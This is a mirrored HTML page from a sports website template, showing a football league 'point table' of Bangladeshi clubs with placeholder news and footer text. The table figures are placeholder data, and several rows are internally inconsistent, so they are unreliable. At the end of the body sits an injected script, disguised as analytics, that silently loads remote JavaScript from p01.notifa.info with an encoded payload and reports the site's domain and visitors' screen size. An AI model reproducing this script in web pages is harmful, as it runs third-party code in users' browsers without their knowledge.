<!doctype html>
<html class="no-js" lang="en">

<!-- Mirrored from preview.hasthemes.com/suparsport-preview/suparsport/point-table.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 13 Oct 2019 12:44:23 GMT -->
<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title>Point Table - SuperSport</title>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- Favicon -->
    <link rel="shortcut icon" type="image/x-icon" href="img/favicon.ico">
    <!-- Fonts -->
    <link rel="stylesheet" href="css/montserrat.css">
    <!-- CSS -->
    <!-- Bootstrap CSS
	============================================ -->
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <!-- Icon Font CSS
	============================================ -->
    <link rel="stylesheet" href="css/material-design-iconic-font.min.css">
    <link rel="stylesheet" href="css/font-awesome.min.css">
    <!-- Plugins CSS
	============================================ -->
    <link rel="stylesheet" href="css/plugins.css">
    <!-- Style CSS
	============================================ -->
    <link rel="stylesheet" href="style.css">
    <!-- Modernizer JS
	============================================ -->
    <script src="js/vendor/modernizr-2.8.3.min.js"></script>
</head>

<body>
<!-- Body main wrapper start -->
<div class="wrapper fix">

<!-- Header Area Start -->
<div id="header-area" class="header-area section">
    <div class="container">
        <div class="row">
            <div class="col-xs-12">
                <!-- Logo -->
                <a class="logo float-left" href="index.html"><img src="img/logo.png" alt=""></a>
                <!-- Mini Cart -->
                <div class="mini-cart float-right">
                    <a href="#"><i class="zmdi zmdi-shopping-basket"></i></a>
                </div>
                <!---- Menu ---->
                <div id="main-menu" class="main-menu float-right">
                    <nav>
                        <ul>
                            <li><a href="index.html">home</a></li>
                            <li><a href="about.html">about</a></li>
                            <li><a href="team.html">team</a></li>
                            <li><a href="fixture.html">fixture</a></li>
                            <li class="active"><a href="point-table.html">point table</a></li>
                            <li><a href="blog.html">blog</a>
                                <ul>
                                    <li><a href="blog.html">blog</a></li>
                                    <li><a href="blog-details.html">blog details</a></li>
                                </ul>
                            </li>
                            <li><a href="shop.html">shop</a>
                                <ul>
                                    <li><a href="shop.html">shop</a></li>
                                    <li><a href="product-details.html">product details</a></li>
                                    <li><a href="cart.html">cart</a></li>
                                    <li><a href="wishlist.html">wishlist</a></li>
                                    <li><a href="checkout.html">checkout</a></li>
                                </ul>
                            </li>
                            <li><a href="contact.html">contact</a></li>
                        </ul>
                    </nav>
                </div>
                <!---- Mobile Menu ---->
                <div class="mobile-menu"></div>
            </div>
        </div>
    </div>
</div>
<!-- Header Area End -->

<!-- Page Banner Area Start -->
<div id="page-banner-area" class="page-banner-area section">
    <div class="container">
        <div class="row">
            <div class="page-banner-title text-center col-xs-12">
                <h2>point table</h2>
            </div>
        </div>
    </div>
</div>
<!-- Page Banner Area End -->

<!-- Point Table Area Start -->
<div id="point-table-area" class="point-table-area section pb-120 pt-120">
    <div class="container">
        <div class="row">
            <div class="col-md-10 col-md-offset-1 col-xs-12 text-center">
                <!-- Points Table -->
                <div class="table-responsive points-table">
                    <table class="table mb-0">
                        <tr>
                            <th>2016 / 2017</th>
                            <th>GP</th>
                            <th>W</th>
                            <th>D</th>
                            <th>L</th>
                            <th>F</th>
                            <th>PT</th>
                        </tr>
                        <tr>
                            <td>01. Abahani</td>
                            <td>25</td>
                            <td>21</td>
                            <td>2</td>
                            <td>2</td>
                            <td>52</td>
                            <td>48</td>
                        </tr>
                        <tr>
                            <td>02. Mohammedan</td>
                            <td>25</td>
                            <td>20</td>
                            <td>2</td>
                            <td>2</td>
                            <td>45</td>
                            <td>47</td>
                        </tr>
                        <tr>
                            <td>03. Arambagh KS</td>
                            <td>25</td>
                            <td>19</td>
                            <td>1</td>
                            <td>3</td>
                            <td>44</td>
                            <td>45</td>
                        </tr>
                        <tr>
                            <td>04. Brothers Union</td>
                            <td>25</td>
                            <td>19</td>
                            <td>1</td>
                            <td>3</td>
                            <td>40</td>
                            <td>44</td>
                        </tr>
                        <tr>
                            <td>05. Feni Soccer Club</td>
                            <td>25</td>
                            <td>19</td>
                            <td>1</td>
                            <td>3</td>
                            <td>40</td>
                            <td>44</td>
                        </tr>
                        <tr>
                            <td>06. Muktijoddha Sangsad</td>
                            <td>25</td>
                            <td>17</td>
                            <td>1</td>
                            <td>5</td>
                            <td>40</td>
                            <td>40</td>
                        </tr>
                        <tr>
                            <td>07. Sheikh Jamal</td>
                            <td>25</td>
                            <td>19</td>
                            <td>1</td>
                            <td>3</td>
                            <td>44</td>
                            <td>45</td>
                        </tr>
                        <tr>
                            <td>08. Sheikh Russel KC</td>
                            <td>25</td>
                            <td>19</td>
                            <td>1</td>
                            <td>3</td>
                            <td>40</td>
                            <td>44</td>
                        </tr>
                        <tr>
                            <td>09. Team BJMC</td>
                            <td>25</td>
                            <td>19</td>
                            <td>1</td>
                            <td>3</td>
                            <td>40</td>
                            <td>44</td>
                        </tr>
                        <tr>
                            <td>10. Dhaka Soccer Club</td>
                            <td>25</td>
                            <td>17</td>
                            <td>1</td>
                            <td>5</td>
                            <td>40</td>
                            <td>40</td>
                        </tr>
                    </table>
                </div>
            </div>
        </div>
    </div>
</div>
<!-- Point Table Area End -->

<!-- Breaking News Area Start -->
<div class="breaking-news-area section overlay pb-40 pt-40">
    <div class="container">
        <div class="row">
            <!-- Breaking News Wrapper -->
            <div class="news-wrapper col-xs-12">
                <h4>Breaking News :</h4>
                <!-- Breaking News Slider -->
                <div class="bnews-slider">
                    <a href="#">There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration.</a>
                    <a href="#">There are many variations of passages of Lorem Ipsum available.</a>
                    <a href="#">There are many variations of passages of Lorem Ipsum available, but the majority.</a>
                </div>
            </div>
        </div>
    </div>
</div>
<!-- Breaking News Area End -->

<!-- Footer Top Area Start -->
<div class="footer-top-area section pb-70 pt-100">
   <div class="footer-top-left-bg overlay"></div>
    <div class="container">
        <div class="row">
            <!-- Footer About -->
            <div class="col-md-5 col-xs-12 mb-30">
                <div class="footer-about">
                    <img src="img/logo.png" alt="">
                    <p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proiden</p>
                    <div class="social fix">
                        <a href="#"><i class="fa fa-facebook"></i></a>
                        <a href="#"><i class="fa fa-rss"></i></a>
                        <a href="#"><i class="fa fa-google-plus"></i></a>
                        <a href="#"><i class="fa fa-pinterest"></i></a>
                        <a href="#"><i class="fa fa-instagram"></i></a>
                    </div>
                </div>
            </div>
            <!-- Footer Twitter -->
            <div class="col-md-4 col-sm-6 col-xs-12 mb-30">
                <div class="twitter-widget">
                    <h3 class="title">Latest Tweets</h3>
                    <div class="single-twite">
                        <p>Duis aute irure <a href="#">@dolor</a> in rderiin voluptate velit esse cillum dolore eu ft nulla pariatur. Excepteur <a href="#">@sint</a> occaecat..</p>
                        <span>30 minutes ago</span>
                    </div>
                    <div class="single-twite">
                        <p>Duis aute irure <a href="#">@dolor</a> in rderiin voluptate velit esse cillum dolore eu ft </p>
                        <span>15 minutes ago</span>
                    </div>
                </div>
            </div>
            <!-- Footer Subscribe -->
            <div class="col-md-3 col-sm-6 col-xs-12 mb-30">
                <div class="subscribe-widget">
                    <h3 class="title">Newsletters</h3>
                    <div class="subscribe-form">
                        <form action="#">
                            <input type="text" placeholder="your email address">
                            <button class="submit"><i class="zmdi zmdi-mail-send"></i></button>
                        </form>
                    </div>
                    <p><span>Phone:</span> +98 996 554 658</p>
                    <p><span>email:</span> sport@email.com</p>
                </div>
            </div>
            
        </div>
    </div>
</div>
<!-- Footer Top Area End -->

<!-- Footer Bottom Area Start -->
<div class="footer-bottom-area section">
    <div class="container">
        <div class="row">
           
            <!-- Copyright -->
            <div class="copyright text-left col-sm-6 col-xs-12">
                <p>Copyright &copy; <span>Supar Sport</span>. 2016.All right reserved</p>
            </div>
            <!-- Author Credit -->
            <div class="author-credit text-right col-sm-6 col-xs-12">
                <p>Created by <a href="https://hastech.company/">Hastech</a> With <i class="fa fa-heart-o"></i></p>
            </div>
            
        </div>
    </div>
</div>
<!-- Footer Bottom Area End -->


</div>
<!-- Body main wrapper end -->

<!-- JS -->

<!-- jQuery JS
============================================ -->
<script src="js/vendor/jquery-1.12.0.min.js"></script>
<!-- Bootstrap JS
============================================ -->
<script src="js/bootstrap.min.js"></script>
<!-- Plugins JS
============================================ -->
<script src="js/plugins.js"></script>
<!-- Ajax Mail JS
============================================ -->
<script src="js/ajax-mail.js"></script>
<!-- Main JS
============================================ -->
<script src="js/main.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprAuN%2b5wL0gfuVsruUdXNobRgtsScrT7TX1FZfArujO2lZTKo4%2f5jLK2KF4eSmcAKg67zix4MNjjANDJl%2bc6LQ6KolDcf0PB4cf4jY6Sp33oEkskveXD73fOZ1n%2fybj6aKm62jOuED36%2f1imcmj5gkgMciHAMpGQ6NVT5ePxPN8ky1gm7ffgc35E1%2fNl4hjMAbg7xrwRd5WXdGSNzPQ4dkzI47WQSP%2bXirw6MVBpPCcga%2fSKPaboRIFyFX2ZAh%2fPG3NBHHPWzL8WIwW7BX8gOZUxufQ9EY4ZcvHS2D0s11Sy3RtbB3b3YMjDL0xVO77CkdpL%2bC0HuhVl4QRzftqjT9brtJvbOlJqNGPwIg8AMwjBLBzGdAnKHyaGFhMcEvOAkumWYeodFqjBpDZ4lB1GuMdYtHKkK21wcx0MzXH8AVWwGy63IlM4SuqkOfCK%2foTzqWsCQ5C30i%2fODC%2f%2fzQI19%2bD1uyLe63oXsopZb489m1nyuy7Oaw9sPzEKElDsNZHkaiENPUmX%2bkSzPI9eaALiqY03Q%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>


<!-- Mirrored from preview.hasthemes.com/suparsport-preview/suparsport/point-table.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 13 Oct 2019 12:44:23 GMT -->
</html>